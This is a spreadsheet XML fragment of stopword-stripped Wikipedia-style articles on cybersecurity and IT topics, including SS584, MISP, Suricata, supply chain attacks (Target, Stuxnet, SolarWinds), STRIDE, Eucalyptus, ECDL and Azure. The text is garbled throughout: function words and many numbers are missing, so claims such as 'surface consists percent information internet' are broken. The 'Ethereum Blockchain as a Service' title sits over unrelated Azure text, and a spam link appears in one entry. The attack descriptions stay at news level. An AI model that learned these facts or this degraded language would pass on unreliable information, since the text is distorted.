california: international. isbn 978-0-9745208-1-0. gibson, weldon (1980). sri: founding years. altos, california: stanford research institute. isbn 978-0-913232-80-4. mclaughlin, john weimers, leigh winslow, wardell (2008). silicon valley: year renaissance. palo alto, california: santa clara valley historical association. isbn 978-0-9649217-4-0. darpa: years bridging gap. darpa. 2008. archived original 2011-05-06. further reading history carlson, curtis wilmot, william (2006). innovation: five disciplines creating what customers want. york: crown publishing group. isbn 978-0-307-33669-9. lento, thomas (2006). inventing future: years innovation sarnoff. princeton, jersey: sarnoff corporation. isbn 978-0-9785463-0-4. gibson, weldon (1986). sri: take-off days. altos, california: stanford research institute. isbn 978-0-86576-103-2. specific topics crane, hewitt; kinderman, edwin; malhotra, ripudaman (june 2010). cubic mile oil. oxford, york: oxford university press usa. isbn 978-0-19-532554-6. markoff, john (2005). what dormouse said: counterculture shaped personal computer industry. york: viking adult. isbn 978-0-670-03382-9. hafner, katie (1996). where wizards stay late: origins internet (with matthew lyon). york: simon schuster. isbn 978-0-684-83267-8. bowden, mark (2011). worm: first digital world [about conficker computer worm]. york: atlantic monthly press. isbn 978-0-8021-1983-4. external links international website</t>
  </si>
  <si>
    <t>SS584</t>
  </si>
  <si>
    <t>(also known multi-tier cloud security (mtcs)) information security standard, published singapore standards. standard last revised 2015. specifies management system cloud security, three levels. organizations meet requirements certified accredited certification body following successful completion audit. rationale although cloud service providers certified 27000, standard focus unique risks arising provisioning cloud. smaller customers also difficulty assessing csp's isms sufficient needs, 27001 risk-based, vary significantly implementations. this barrier adoption smes, would like simpler decide meets needs. encourage adoption cloud services, established series groups 2012 produce standard csps could certify standard would multiple levels security assurance: tier designed non-business critical data system, baseline security controls address security risks threats potentially impact information systems using cloud services (e.g.: site hosting public information) tier designed address need organizations running business critical data systems stringent security controls address security risks threats potentially moderate impact information systems using cloud services protect business personal information (e.g.: confidential business data, email, customer relation management systems) tier designed regulated organizations specific requirements stringent security requirements. industry specific regulations applied addition controls supplement address security risks threats high impact information systems using cloud services (e.g.: highly confidential business data, financial records, medical records)note standard interchangeably uses terms "tiers" "levels". history ss584:2013 issued 2013, program initially administered ida.in 2015, standard revised 584:2015). time, accreditation handed singapore accreditation council, division enterprise singapore, line singapore standards. late 2019, standard revised again, inputs industry, version issued 2020. certification csps wish services certified must classify iaas, paas, saas. they also decide level wish demonstrate compliance (tier compliance level must certified iso/iec 27001. csps must obtain services accredited certification body, audit management system compliance 584. issue certificate attesting this, usually valid three years. annual surveillance audits required. list services csps certified available. examples certified csps include aws. overseas acceptance although standard international standard, first national standard address cloud security, seen acceptance outside singapore. particular, korean rseft regulations recognise meeting requirements csps.documents datamation cloudwatchhub describe international impact standard. also cyber security standards iso/iec 27001 singapore standard (regulatory policy) references</t>
  </si>
  <si>
    <t>Malware Information Sharing Platform</t>
  </si>
  <si>
    <t>misp threat sharing (misp) open source threat intelligence platform. project develops utilities documentation effective threat intelligence, sharing indicators compromise. there several organizations misp instances, listed website. history this project started around june 2011 christophe vandeplas frustration many indicators compromise (iocs) shared email, documents parsable automatic machines. home started play around cakephp made proof concept idea. called cydefsig: cyber defence signatures.mid july 2011 presented personal project work (belgian defence) feedback rather positive. after giving access cydefsig running personal server belgian defence started cydefsig officially starting august 2011. christophe allowed spend time cydefsig work-hours, still working home.at point nato heard project. january 2012 first presentation done introduce depth project. they looked products market offered, seemed deemed openness cydefsig great advantage. andrzej dereszowski first part-time developer nato side.one thing another months later nato hired full-time developer improve code features. collaborative development started date. many personal projects license explicitly written yet, collaboratively decided project would released publicly affero license. this share code many people possible protect harm.the project renamed misp: malware information sharing project, name invented alex vandurme nato.in january 2013 andras iklody became main full-time developer misp, initially hired nato evening week-end contributor open source project.meanwhile organisations started adopt software promoted around cert world (cert-eu, circl, many others).nowadays, andras iklody lead developer misp project works circl.as misp project expanded, misp covering malware indicators also fraud vulnerability information. name misp threat sharing, includes core misp software myriad tools (pymisp) format (core format, misp taxonomies, warning-lists) support misp. misp community project team volunteers. funding project funded european union (through connecting europe facility) computer incident response center luxembourg. intelligence integration indicators compromise managed misp originate variety sources; including internal incident investigation teams, intelligence sharing partners commercial intelligence sources. commercial sources integration misp include symantec's deepsight intelligence (now called broadcom), kaspersky threat feeds mcafee active response. misp integrations open-source commercial threat intelligence platforms include threatquotient platform eclecticiq platform. references external links official website ietf draft-dulaunoy-misp-taxonomy-format-06 building designing misp: practical information-sharing tool cybersecurity fraud indicators privacy aware sharing iocs misp misp: sharing done differently</t>
  </si>
  <si>
    <t>Suricata (software)</t>
  </si>
  <si>
    <t>suricata open source-based intrusion detection system (ids) intrusion prevention system (ips). developed open information security foundation (oisf). beta version released december 2009, first standard release following july 2010. free intrusion detection systems ossec hids prelude hybrid sagan snort zeek nids also aanval references external links official website open information security foundation "suricata". freecode.</t>
  </si>
  <si>
    <t>Estonian Defence League's Cyber Unit</t>
  </si>
  <si>
    <t>estonian defence league’s cyber unit (estonian: küberkaitseliit, kkl) group units within certain malevs estonian defense league established 2010. created inspiration 2007 cyberattacks estonia spearheaded informatics scientist jaaksoo, focuses defense estonian state private telecommunications infrastructure outside-derived cyberattacks, mostly employs volunteer participation professionals. headquartered grounds tartu tallinn malevs, jointly headed tallinn jaan priisalu tartu kuido külm. purpose kkl's mission protect estonia's high-tech life, protecting information infrastructure, thus carrying broad defense goals. highly skilled professionals volunteer youth organizations; cybersecurity critical information infrastructure increase level awareness rise dissemination best practices; network, brings together public private sector crisis competence, organizational development, times crisis; members continuous training training: members preparation; action plans; prevention increasing cyber activities; participation cybersecurity-related international cooperation networks proposed conscription defence minister jaak aaviksoo publicly suggested desire spread units branches option conscripted estonian military. also ccdcoe (nato) national cyber security centre (disambiguation) references external links http://www.kaitseliit.ee/en/cyber-unit estonian defence league’s cyber unit küberkaitse üksus</t>
  </si>
  <si>
    <t>Surface web</t>
  </si>
  <si>
    <t>surface (also called visible web, indexed web, indexable lightnet) portion world wide readily available general public searchable standard search engines. opposite deep web, part indexed search engine. surface consists percent information internet. surface made collection public pages server accessible search engine.according source, june 2015, google's index surface contains 14.8 billion pages. also clearnet (networking) references</t>
  </si>
  <si>
    <t>Maker's Asylum</t>
  </si>
  <si>
    <t>maker's asylum makerspace hackerspace started mumbai back 2013 headquartered goa, india, inspired artisan's asylum, chaos computer club maker organisations. history over years maker's asylum graduated yourself) space working intersection education open innovation programs social impact work. with alumni partners countries, maker's asylum enabled plethora open source projects even startups areas hardware, design sustainability. nurturing culture innovation forefront maker movement india. trained 100,000 individuals hardware design, additive manufacturing, digital fabrication. educational programs maker's asylum offers various independent programs focus mission "learning making" enabling makers hour (8+), innovation school (13+) school (15+). programs upper limit believe anyone start maker journeys time. they also offer woodworking residency workshops also curate exciting events workshops maker community rapid prototyping, boat making, pechakucha nights more. various corporate organisations also engaged maker's asylum workshops bring hands learning experience teams. social impact work during pandemic, maker's asylum, largest network decentralized “makers” across india, mobilized members produce urgently needed medical supplies locally across india. major milestones include producing million face shields days open sourcing designs activating makers cities, towns villages india laser cutting machine make first national lockdown 2020; successfully designing building high-flow, open-source oxygen concentrator organizations april 2021; maker's asylum also stepped help solve problem broken equipment, especially large number oxygen concentrators china, usa, france working. with support european union, three oxygen concentrator ‘repair camps” conducted response request rotary club margao, goa, hundreds non-functioning oxygen concentrators assessed fixed; maker's asylum undertook wider study better understand scale broken medical grade equipment india working local communities skilled repair reuse. references external links makersasylum.com</t>
  </si>
  <si>
    <t>Supply chain attack</t>
  </si>
  <si>
    <t>supply chain attack cyber-attack seeks damage organization targeting less-secure elements supply chain. supply chain attack occur industry, financial sector, industry, government sector. supply chain attack happen software hardware. cybercriminals typically tamper manufacturing distribution product installing malware hardware-based spying components. symantec's 2019 internet security threat report states supply chain attacks increased percent 2018. target security breach, eastern european malware, well stuxnet computer worm examples supply chain attacks. supply chain management experts recommend strict control institution's supply network order prevent potential damage cyber criminals. overview supply chain system activities involved handling, distributing, manufacturing, processing goods order move resources vendor hands final consumer. supply chain complex network interconnected players governed supply demand.although supply chain attack broad term without universally agreed upon definition, reference cyber-security, supply chain attack involves physically tampering electronics (computers, atms, power systems, factory data networks) order install undetectable malware purpose bringing harm player supply chain network.in general sense, supply chain attack necessarily involve electronics. 2010 burglars gained access pharmaceutical giant lilly's supply warehouse, drilling hole roof loading million worth prescription drugs truck, could also said carry supply chain attack. however, article discuss cyber attacks physical supply networks rely technology; hence, supply chain attack method used cyber-criminals. attack framework generally, supply chain attacks information systems begin advanced persistent threat (apt) determines member supply network weakest cyber security order affect target organization. according investigation produced verizon enterprise, cyber security incidents analyzed survey occurred among small firms.apt's often gain access sensitive information physically tampering production product. october 2008, european law-enforcement officials "uncovered highly sophisticated credit-card fraud ring" stole customer's account details using untraceable devices inserted credit-card readers made china gain access account information make repeated bank withdrawals internet purchases, amounting estimated $100 million losses. risks threat supply chain attack poses significant risk modern organizations attacks solely limited information technology sector; supply chain attacks affect industry, large retailers, pharmaceutical sector virtually industry complex supply network.the information security forum explains risk derived supply chain attacks information sharing suppliers, states "sharing information suppliers essential supply chain function, also creates risk... information compromised supply chain damaging compromised within organization".while muhammad nasir national university emerging sciences, associates above-mentioned risk wider trend globalization stating "…due globalization, decentralization, outsourcing supply chains, numbers exposure points also increased greater number entities involved scattered around globe… cyber-attack supply chain destructive damage many linked entities ripple effect."poorly managed supply chain management systems become significant hazards cyber attacks, lead loss sensitive customer information, disruption manufacturing process, could damage company's reputation. examples compiler attacks wired reported connecting thread recent software supply chain attacks, 2019. these surmised spread infected, pirated, popular compilers posted pirate websites. that corrupted versions apple's xcode microsoft visual studio. theory, alternating compilers might detect compiler attacks, compiler trusted root.) target 2013, target, retailer, largest data breaches history retail industry.between november december 2013, target's american brick-and-mortar stores experienced data hack. around million customers' credit debit cards became susceptible fraud malware introduced system 1,800 stores. data breach target's customer information direct impact company's profit, fell percent fourth quarter 2013.six months prior company began installing $1.6 million cyber security system. target team security specialists monitor computers constantly. nonetheless, supply chain attack circumvented security measures.it believed cyber criminals infiltrated third party supplier gain access target's main data network. although officially confirmed, investigation officials suspect hackers first broke target's network november 2013 using passcode credentials stolen fazio mechanical services, pennsylvania-based provider hvac systems.ninety lawsuits filed target customers carelessness compensatory damages. target spent around million responding breach, according fourth-quarter report investors. stuxnet believed american-israeli cyber weapon, stuxnet malicious computer worm. worm specifically targets systems automate electromechanical processes used control machinery factory assembly lines equipment separating nuclear material. computer worm said specifically developed order damage potential uranium enrichment programs government iran; kevin hogan, senior director security response symantec, reported majority infected systems stuxnet worm located islamic republic iran, speculation deliberately targeting "high-value infrastructure" country including either bushehr nuclear power plant natanz nuclear power plant.stuxnet typically introduced supply network infected flash drive persons physical access system. worm travels across cyber network, scanning software computers controlling programmable logic controller (plc). stuxnet introduces infected rootkit onto modifying codes giving unexpected commands returning loop normal operation value feedback users. malware recent years malware known suceful, plotus, tyupkin greendispenser affected automated teller machines globally, especially russia ukraine. greendispenser specifically gives attackers ability walk infected system remove cash vault. when installed, greendispenser display ‘out service’ message atm, attackers right access credentials drain atm's cash vault remove malware system using untraceable delete process.the types malware usually behave similar fashion, capturing magnetic stripe data machine's memory storage instructing machines withdraw cash. attacks require person insider access, technician anyone else machine, place malware atm.the tyupkin malware active march 2014 atms banking institutions eastern europe, believed also spread time u.s., india, china. malware affects atms major manufacturers running microsoft windows 32-bit operating systems. malware displays information much money available every machine allows attacker withdraw notes selected cassette atm. notpetya m.e.doc during spring 2017, core code financial package "m.e.doc" used ukraine infected notpetya virus subsequently downloaded subscribers. hack carried provider's system: either hacking code provider, hack re-routing download requests another server. press reports time make clear supply chain attack, attack vector used specified. british airways during august september 2018 british airways website payment section contained code harvested customer payment data. injected code written specifically route credit card information website domain baways.com, could erroneously thought belong british airways. solarwinds 2020 global supply chain cyberattack believed resulted supply chain attack targeting infrastructure company solarwinds, counts many federal institutions among clients, including business computers national nuclear security administration (nnsa). department homeland security issued emergency directive 21-01, "mitigate solarwinds orion code compromise" involves disconnecting afflicted windows host enterprise domain, rebuilding windows hosts using trusted sources. afflicted windows operating system (os) hosts monitored solarwinds orion monitoring software. doe's nnsa since disconnected breached windows hosts.in addition u.s. federal government, 18,000 solarwinds' 33,000 customers solarwinds orion software update platform vulnerable. orion compromised march june 2020, cyber breach detected fireeye december 2020. example, microsoft victim update software breach. microsoft working fireeye contain ongoing cyber attack contained supply chain software used "government, consulting, technology, telecom extractive entities north america, europe, asia middle east" —fireeye.volexity, cybersecurity firm, reconstructed attack sequence unnamed think tank: first, attacker exploited remote code execution vulnerability on-premise microsoft exchange server; vulnerability remedied, attacker exploited security holes solarwinds orion platform, exposed december 2020; third, think tank's two-factor authentication proxy server exploited gain access breach infrastructure think tank again. based volexity's reconstruction, breaking defense published simplified kill chain explaining exchange server attack estimated 30,000 customers worldwide. july 2021 solarwinds announced attacked again. microsoft exchange server february 2021 microsoft determined attackers downloaded files "(subsets service, security, identity)" apiece small subset azure components" small subset intune components" small subset exchange components"none microsoft repositories contained production credentials. repositories secured december, attacks ceased january. however, march 2021 20,000 organizations compromised back door installed flaws exchange server. affected organizations self-hosted e-mail (on-site rather cloud-based) credit unions, town governments, small businesses. flaws patched march 2021, march 2021 compromised organizations implemented patch; back door remains open. officials attempting notify affected organizations smaller organizations affected december 2020.microsoft updated indicators compromise tool released emergency mitigation measures exchange server flaws. attacks solarwinds microsoft software currently thought independent, march 2021. indicators compromise tool allows customers scan exchange server files compromise. least attacking groups using exchange server flaws. shells remain patched server; still allows cyberattacks based affected servers. march 2021 exploit attempts doubling every hours, according check point research, name security researchers themselves.by april 2021 completed covert cyber operation remove shells afflicted servers informing servers' owners done.in 2021 microsoft identified 3000 malicious emails organizations countries, launched group microsoft denoted 'nobelium'. many emails blocked delivery. 'nobelium' gained access constant contact "email marketing account used agency international development (usaid)". security researchers assert 'nobelium' crafts spear-phishing email messages clicked unsuspecting users; links direct installation malicious 'nobelium' code infect users' systems, making subject ransom, espionage, disinformation, etc. government identified 'nobelium' stemming russia's federal security service. july 2021 government expected name initiator exchange server attacks: "china’s ministry state security using criminal contract hackers".in september 2021 securities exchange commission (sec) enforcement staff requested companies downloaded compromised solarwinds updates, voluntarily turn data installed compromised updates servers.in july 2022 sessionmanager, malicious module hosted (installed default exchange servers), discovered infected exchange servers since march 2021; sessionmanager searches memory passwords, downloads modules, hijack server. golden saml mandiant, security firm, shown nation-state-sponsored groups, gained access corporate clouds, exploit security assertion markup language (saml), gain federated authentication active directory similar services, will. ransomware attacks 2021 ransomware attack colonial pipeline exposed vulnerability us's gasoline supply east coast. june 2021, president biden warned president putin types infrastructure off-limits cyberattack, else russia would suffer kind. combination supply-chain attack ransomware attack surfaced july 2021 thousands companies countries. revil ransomware code written avoid hitting sites russian. revil site offline according york times. prevention 2021, executive order 14028 (the eo), improving nation's cybersecurity, tasked nist well government agencies enhancing cybersecurity united states. july 2021 (day timeline) nist, consultation cybersecurity infrastructure security agency (cisa) office management budget (omb), delivered '4i': guidance users critical software, well '4r': minimum vendor testing security integrity software supply chain. solicit input define 'critical software' task user guidance, vendor testing 180: task guidelines enhancing supply chain software security 270: task guidelines enhancing supply chain software 360: task guidelines review update procedures supply chain software 365: task summary support pilot government comprehensive national cybersecurity initiative cyberspace policy review passed bush obama administrations respectively, direct u.s. federal funding development multi-pronged approaches global supply chain risk management. according adrian davis technology innovation management review, securing organizations supply chain attacks begins building cyber-resilient systems. supply chain resilience according supply chain risk management expert donal walters, "the ability supply chain cope unexpected disturbances" characteristics company-wide recognition supply chain susceptible infiltration. supply chain management plays crucial role creating effective supply chain resilience.in march 2015, conservative liberal democratic government coalition, department business outlined efforts protect smes cyber attacks, included measures improve supply chain resilience.the government produced cyber essentials scheme, trains firms good practices protect supply chain overall cyber security. financial institutions depository trust clearing group, american post-trade company, operations implemented governance vulnerability management throughout supply chain looks security along entire development lifecycle; includes software coded hardware manufactured. 2014 report, titled "threat smart: building cyber resilient financial institution", financial services firm recommends following approach mitigating cyber attack: avoid potential damage financial institution’s bottom line, reputation, brand, intellectual property, executive team needs take ownership cyber risk. specifically, collaborate front understand institution defend respond cyber risks, take make organization cyber resilient. cyber security firms fireeye, network security company provides automated threat forensics dynamic malware protection advanced cyber threats, advanced persistent threats spear phishing, recommends firms certain principles place create resilience supply chain, includes having: small supplier base: this allows firm tighter control suppliers. stringent vendor controls: imposing stringent controls suppliers order abide lists approved protocols. also conducting occasional site audits supplier locations personnel visiting sites regular basis business purposes allows greater control. security built design: security features, check digits, designed software detect previous unauthorized access code. iterative testing process code functionally hardened security-hardened good approach. april 2015, sergey lozhkin, senior security researcher great kaspersky lab, spoke importance managing risk targeted attacks cyber-espionage campaigns, conference cyber security stated: "mitigation strategies advanced threats include security policies education, network security, comprehensive system administration specialized security solutions, like... software patching features, application control, whitelisting default deny mode." also advanced persistent threat cyber-attack watering hole attack notes references external links malware captures pins cash updated wired</t>
  </si>
  <si>
    <t>STRIDE (security)</t>
  </si>
  <si>
    <t>stride model identifying computer security threats developed praerit garg loren kohnfelder microsoft. provides mnemonic security threats categories.the threats are: spoofing tampering repudiation information disclosure (privacy breach data leak) denial service elevation privilegethe stride initially created part process threat modeling. stride model threats, used help reason find threats system. used conjunction model target system constructed parallel. this includes full breakdown processes, data stores, data flows, trust boundaries.today often used security experts help answer question "what wrong system we're working on?" each threat violation desirable property system: notes threats repudiation unusual threat viewed security perspective, desirable property privacy systems, example, goldberg's "off record" messaging system. this useful demonstration tension security design analysis must sometimes grapple with. elevation privilege often called escalation privilege, privilege escalation. they synonymous. also attack tree another approach security threat modeling, stemming dependency analysis cyber security countermeasure dread (risk assessment model) another mnemonic security threats owasp organization devoted improving application security education also known another mnemonic security model build security systems references external links uncover security design flaws using stride approach</t>
  </si>
  <si>
    <t>MalSec</t>
  </si>
  <si>
    <t>malsec abbreviation "malicious security") splinter faction anonymous pledges hacktivism ethically empower people. group said want turn away trickster ways become forthright force fighting censorship internet improving security free pentests. references</t>
  </si>
  <si>
    <t>Eucalyptus (software)</t>
  </si>
  <si>
    <t>eucalyptus paid open-source computer software building amazon services (aws)-compatible private hybrid cloud computing environments, originally developed company eucalyptus systems. eucalyptus acronym elastic utility computing architecture linking your programs useful systems. eucalyptus enables pooling compute, storage, network resources dynamically scaled application workloads change. mårten mickos eucalyptus. september 2014, eucalyptus acquired hewlett-packard maintained technology. after stopped developing product late 2017, appscale systems forked code started supporting eucalyptus customers. history software development roots virtual grid application development software project, rice university institutions 2003 2008. rich wolski group university california, santa barbara (ucsb), became chief technical officer company headquartered goleta, california returning teach ucsb.eucalyptus software included ubuntu 9.04 distribution 2009. company formed 2009 $5.5 million funding benchmark capital commercialize software.the co-founders eucalyptus rich wolski (cto), nurmi, neil soman, dmitrii zagorodnov, chris grzegorczyk, graziano obertelli woody rollins (ceo). eucalyptus systems announced formal agreement amazon services march 2012. hewlett-packard acquired eucalyptus september 2014, although 2016 public cloud offering helion shut down. eucalyptus team transferred enterprise services division, split away merged computer sciences corporation forming technology april 2017. chose stop development support eucalyptus 2017, prompting appscale systems, members eucalyptus founding team, fork code. appscale systems started commercially supporting developing software, renamed appscale ats, since late 2017. software architecture eucalyptus commands manage either amazon eucalyptus instances. users also move instances eucalyptus private cloud amazon elastic compute cloud create hybrid cloud. hardware virtualization isolates applications computer hardware details. eucalyptus uses terminology: images image fixed collection software modules, system software, application software, configuration information started known baseline (immutable/fixed). when bundled uploaded eucalyptus cloud, becomes eucalyptus machine image (emi). instances when image use, called instance. configuration executed runtime, cloud controller decides image run, storage networking attached meet resource needs. addressing eucalyptus instances public private addresses. address assigned instance instance created image. instances require persistent address, web-server, eucalyptus supplies elastic addresses. these pre-allocated eucalyptus cloud reassigned running instance. security tcp/ip security groups share common firewall rules. this mechanism firewall instance using address port block/allow functionality. instances isolated tcp/ip layer present, user could manipulate networking instances gain access neighboring instances violating basic cloud tenet instance isolation separation. networking there three networking modes. managed mode, eucalyptus manages local network instances, including security groups addresses. system mode, eucalyptus assigns address attaches instance's network interface physical network node controller's bridge. system mode offer elastic addresses, security groups, isolation. static mode, eucalyptus assigns addresses instances. static mode offer elastic ips, security groups, isolation. access control user eucalyptus assigned identity, identities grouped together access control. components eucalyptus components: cloud controller (clc) java program offers ec2-compatible interfaces, well interface outside world. addition handling incoming requests, acts administrative interface cloud management performs high-level resource scheduling system accounting. accepts user requests command-line interfaces like euca2ools gui-based tools like eucalyptus user console manages underlying compute, storage, network resources. only exist cloud handles authentication, accounting, reporting, quota management. walrus, also written java, eucalyptus equivalent simple storage service (s3). walrus offers persistent storage virtual machines eucalyptus cloud used simple http put/get storage service solution. there data type restrictions walrus, contain images (i.e., building blocks used launch virtual machines), volume snapshots (i.e., point-in-time copies), application data. only walrus exist cloud. cluster controller (cc) written acts front cluster within eucalyptus cloud communicates storage controller node controller. manages instance (i.e., virtual machines) execution service level agreements (slas) cluster. storage controller (sc) written java eucalyptus equivalent ebs. communicates cluster controller node controller manages eucalyptus block volumes snapshots instances within specific cluster. instance requires writing persistent data memory outside cluster, would need write walrus, available instance cluster. vmware broker optional component provides aws-compatible interface vmware environments physically runs cluster controller. vmware broker overlays existing esx/esxi hosts transforms eucalyptus machine images (emis) vmware virtual disks. vmware broker mediates interactions cluster controller vmware connect directly either esx/esxi hosts vcenter server. node controller (nc) written hosts virtual machine instances manages virtual network endpoints. downloads caches images walrus well creates caches instances. while theoretical limit number node controllers cluster, performance limits exist. amazon services compatibility organizations reuse aws-compatible tools, images, scripts manage on-premises infrastructure service (iaas) environments. implemented eucalyptus, tools cloud ecosystem communicate eucalyptus. march 2012, amazon services eucalyptus announced details compatibility eucalyptus. part agreement, support eucalyptus continue extend compatibility apis customer cases. customers applications existing data centers compatible amazon services amazon elastic compute cloud (ec2) amazon simple storage service (s3).in june, 2013, eucalyptus released, featuring series aws-compatible tools. these include: autoscaling allows application developers scale eucalyptus cloud resources order maintain performance meet slas. with auto-scaling, developers instances virtual machines traffic demands increase. auto-scaling policies eucalyptus defined using amazon ec2-compatible apis tools. elastic load balancing service distributes incoming application traffic service calls across multiple eucalyptus workload instances, providing greater application fault tolerance. cloudwatch monitoring tool similar amazon cloudwatch monitors resources applications eucalyptus clouds. using cloudwatch, application developers cloud administrators program collection metrics, alarms identify trends endangering workload operations, take action ensure applications continue smoothly.eucalyptus also first private cloud platform support netflix's open source tools including chaos monkey, asgard, edda fidelity aws. functionality eucalyptus user console provides interface users self-service provision configure compute, network, storage resources. development test teams manage virtual instances using built-in management encryption capabilities. access virtual instances available using familiar mechanisms. virtual instances application configuration stopped restarted using encrypted boot capability. iaas service components cloud controller, cluster controller, walrus, storage controller, vmware broker configurable redundant systems resilient multiple types failures. management state cloud machine preserved reverted normal operating conditions event hardware software failure. eucalyptus multiple versions windows linux virtual machine images. users build library eucalyptus machine images (emis) application metadata decoupled infrastructure details allow eucalyptus clouds. amazon machine images also compatible eucalyptus clouds. vmware images vapps converted eucalyptus clouds public clouds. eucalyptus user identity management integrated existing microsoft active directory ldap systems fine-grained role based access control cloud resources. eucalyptus supports storage area network devices take advantage storage arrays improve performance reliability. eucalyptus machine images backed ebs-like persistent storage volumes, improving performance image launch time enabling fully persistent virtual machine instances. eucalyptus also supports direct-attached storage. eucalyptus offers features compatibility. these include resource tagging, allows application developers cloud administrators assign customizable metadata tags resources firewalls, load balancers, servers, individual workloads better identify them. eucalyptus also supports expanded instance types closely align instance types amazon ec2. eucalyptus also includes maintenance mode allows cloud administrators perform maintenance eucalyptus clouds zero downtime instances cloud applications. also includes user console features magic search bar, easy option allow users change password.eucalyptus 3.4, released october 2013, added features including improved image management migration tools, capabilities warm upgrades, hybrid cloud user console manage eucalyptus resources, identity access management (iam) roles, improved high availability (ha) capabilities.faststart demonstration configurations allow private cloud quickly steps possible available. release history references external links official website best training institute madhapur hyderabad</t>
  </si>
  <si>
    <t>European Computer Driving Licence</t>
  </si>
  <si>
    <t>international computer driving licence (icdl), formerly known european computer driving licence (ecdl), computer literacy certification program provided ecdl foundation, not-for-profit organisation. icdl ecdl certification globally recognised information communication technology (ict) digital literacy qualification. other name, difference ecdl icdl recognised equivalent. according ecdl foundation, million people countries registered candidates ecdl.in 1995, ecdl certification programme developed task force council european professional informatics societies (cepis) recommended european commission high level group, esdis, europe-wide certification scheme. task force compared several national certification schemes chose finland basis piloting later adoption ecdl.in used national health service benchmark qualification available without charge staff. testing order take tests, candidate buys ecdl skills card, usually issued electronically serves login testing platform. prepare module test, candidate ecdl diagnostic tests. testing done using software simulates windows/microsoft office environment. candidate's mouse movements keystrokes monitored result test reported immediately test completed. ecdl icdl since 2013, syllabus divided modules three levels: base modules computer essentials online essentials word processing spreadsheets theory intermediate modules presentation using databases security online collaboration image editing editing project planning computer aided design health information systems usage education digital marketing advanced modules advanced word processing advanced spreadsheets advanced database advanced presentation original ecdl icdl until 2013 ecdl/icdl syllabus divided seven modules. these are: security users user fundamentals (windows explorer windows word processing (microsoft word 2013) spreadsheets (microsoft excel 2013) databases (microsoft access 2010) presentations (microsoft powerpoint 2010) using email internet (windows explorer windows 7)additionally, advanced version divided four modules. these are: advanced word processing advanced spreadsheets advanced presentation advanced databasemany training centres used microsoft software (the applications used shown parenthesis) software environments could used, apache openoffice/libreoffice. references external links ecdl foundation icdl asiaicdl arabiaicdl africaicdl</t>
  </si>
  <si>
    <t>European Information Technologies Certification Academy</t>
  </si>
  <si>
    <t>european information technologies certification academy (eitca) programme international professional knowledge skills certification standard, developed governed eitci institute non-profit organization based brussels, provides certification individuals' knowledge skills broad field-oriented areas expertise computer graphics, information security etc. eitca programmes, referred eitca academies, include selected sets several dozen individual eitc programmes, together comprise particular area qualifications. eitca academies june 2015 eitca certification standard includes following academies: also eitc programme eitci institute digital divide information society computer literacy distance education digital agenda europe references external links eitci official website eitci certificate accreditation validation page certification academy</t>
  </si>
  <si>
    <t>European Information Technologies Certification Institute</t>
  </si>
  <si>
    <t>european information technologies certification institute (eitci) international non-profit organisation headquartered brussels, belgium, aimed primarily towards promotion digital literacy prevention digital exclusion, providing high quality standards certification knowledge skills area information communication technologies, accordance european commission's guidelines. knowledge skills certification standards eitci provides constant development, governance, certification following professional knowledge skills certification standards: european information technologies certification (eitc) programme provides certification individuals' knowledge skills narrow, specialized single-subject areas office software, computer-aided project management, online collaboration systems, raster graphics processing. european information technologies certification academy (eitca) programme provides certification individuals' knowledge skills broader field-oriented areas expertise computer graphics, information security etc. eitca programmes, referred eitca academies, include selected sets several dozen individual eitc programmes, together comprise particular area qualifications. also eitca programme eitc programme digital divide information society computer literacy distance education digital agenda europe references</t>
  </si>
  <si>
    <t>European Information Technologies Certification</t>
  </si>
  <si>
    <t>european information technologies certification (eitc) programme international professional knowledge skills certification standard. developed governed eitci institute, non-profit organization based brussels provides certification individuals' knowledge skills narrow, specialized single-subject areas office software, computer-aided project management, online collaboration systems, raster graphics processing. also eitca programme eitci institute digital divide information society computer literacy distance education digital agenda europe references external links eitci official website eitci certificate accreditation validation page</t>
  </si>
  <si>
    <t>Ethereum Blockchain as a Service</t>
  </si>
  <si>
    <t>microsoft azure, often referred azure azh-ər, ay-zhər, also az-ure, ay-zure), cloud computing service operated microsoft application management microsoft-managed data centers. provides software service (saas), platform service (paas) infrastructure service (iaas) supports many different programming languages, tools, frameworks, including microsoft-specific third-party software systems. azure, announced microsoft's professional developers conference (pdc) october 2008, went internal project codename "project dog", formally released february 2010, windows azure renamed microsoft azure march 2014. services azure uses large-scale virtualization microsoft data centers worldwide offers services. computer services virtual machines, infrastructure service (iaas) allowing users launch general-purpose microsoft windows linux virtual machines, well preconfigured machine images popular software packages.most users linux azure, many linux distributions offered, including microsoft's linux-based azure sphere. services, platform service (paas) environment letting developers easily publish manage websites. websites, azure sites allows developers build sites using asp.net, php, node.js, java, python deployed using ftp, git, mercurial, team foundation server uploaded user portal. this feature announced preview form june 2012 meet microsoft azure event. customers create websites php, asp.net, node.js, python, select several open source applications gallery deploy. this comprises aspect platform service (paas) offerings microsoft azure platform. renamed apps april 2015. webjobs, applications deployed service environment implement background processing invoked schedule, demand, continuously. blob, table queue services used communicate webapps,xyz,ios softwares webjobs provide state. azure kubernetes service (aks) allows quickly deploy production ready kubernetes cluster azure. azure responsible managing control plane customers flexibility choose/scale data place (kubernetes worker nodes). identity azure active directory used synchronize on-premises directories enable (single sign on). azure active directory allows consumer identity access management cloud. azure active directory domain services used join azure virtual machines domain without domain controllers. azure information protection used protect sensitive information. azure active directory external identities capabilities allow organizations collaborate external users including customers partners. mobile services mobile engagement collects real-time analytics highlight users’ behavior. also provides push notifications mobile devices. hockeyapp used develop, distribute, beta-test mobile apps. storage services storage services provides rest apis storing accessing data cloud. table service lets programs store structured text partitioned collections entities accessed partition primary key. azure table service nosql non-relational database. blob service allows programs store unstructured text binary data blobs accessed http(s) path. blob service also provides security mechanisms control access data. queue service lets programs communicate asynchronously message using queues. file service allows storing access data cloud using rest apis protocol. communication services azure communication services offers creating mobile communications applications include sms, video calling, voip pstn calling, based chat. data management azure data explorer provides data analytics data-exploration capabilities azure search provides text search subset odata's structured filters using rest apis. cosmos nosql database service implements subset select statement json documents. azure cache redis managed implementation redis. storsimple manages storage tasks on-premises devices cloud storage. azure database works create, scale extend applications cloud using microsoft server technology. also integrates active directory, microsoft system center hadoop. azure synapse analytics fully managed cloud data warehouse. azure data factory, data integration service allows creation data-driven workflows cloud orchestrating automating data movement data transformation. azure data lake scalable data storage analytic service data analytics workloads require developers massively parallel queries. azure hdinsight data relevant service, deploys hortonworks hadoop microsoft azure, supports creation hadoop clusters using linux ubuntu. azure stream analytics serverless scalable event processing engine enables users develop real-time analytics multiple streams data sources devices, sensors, sites, social media, applications. messaging microsoft azure service allows applications running azure premises off-premises devices communicate azure. this helps build scalable reliable applications service-oriented architecture (soa). azure service supports four different types 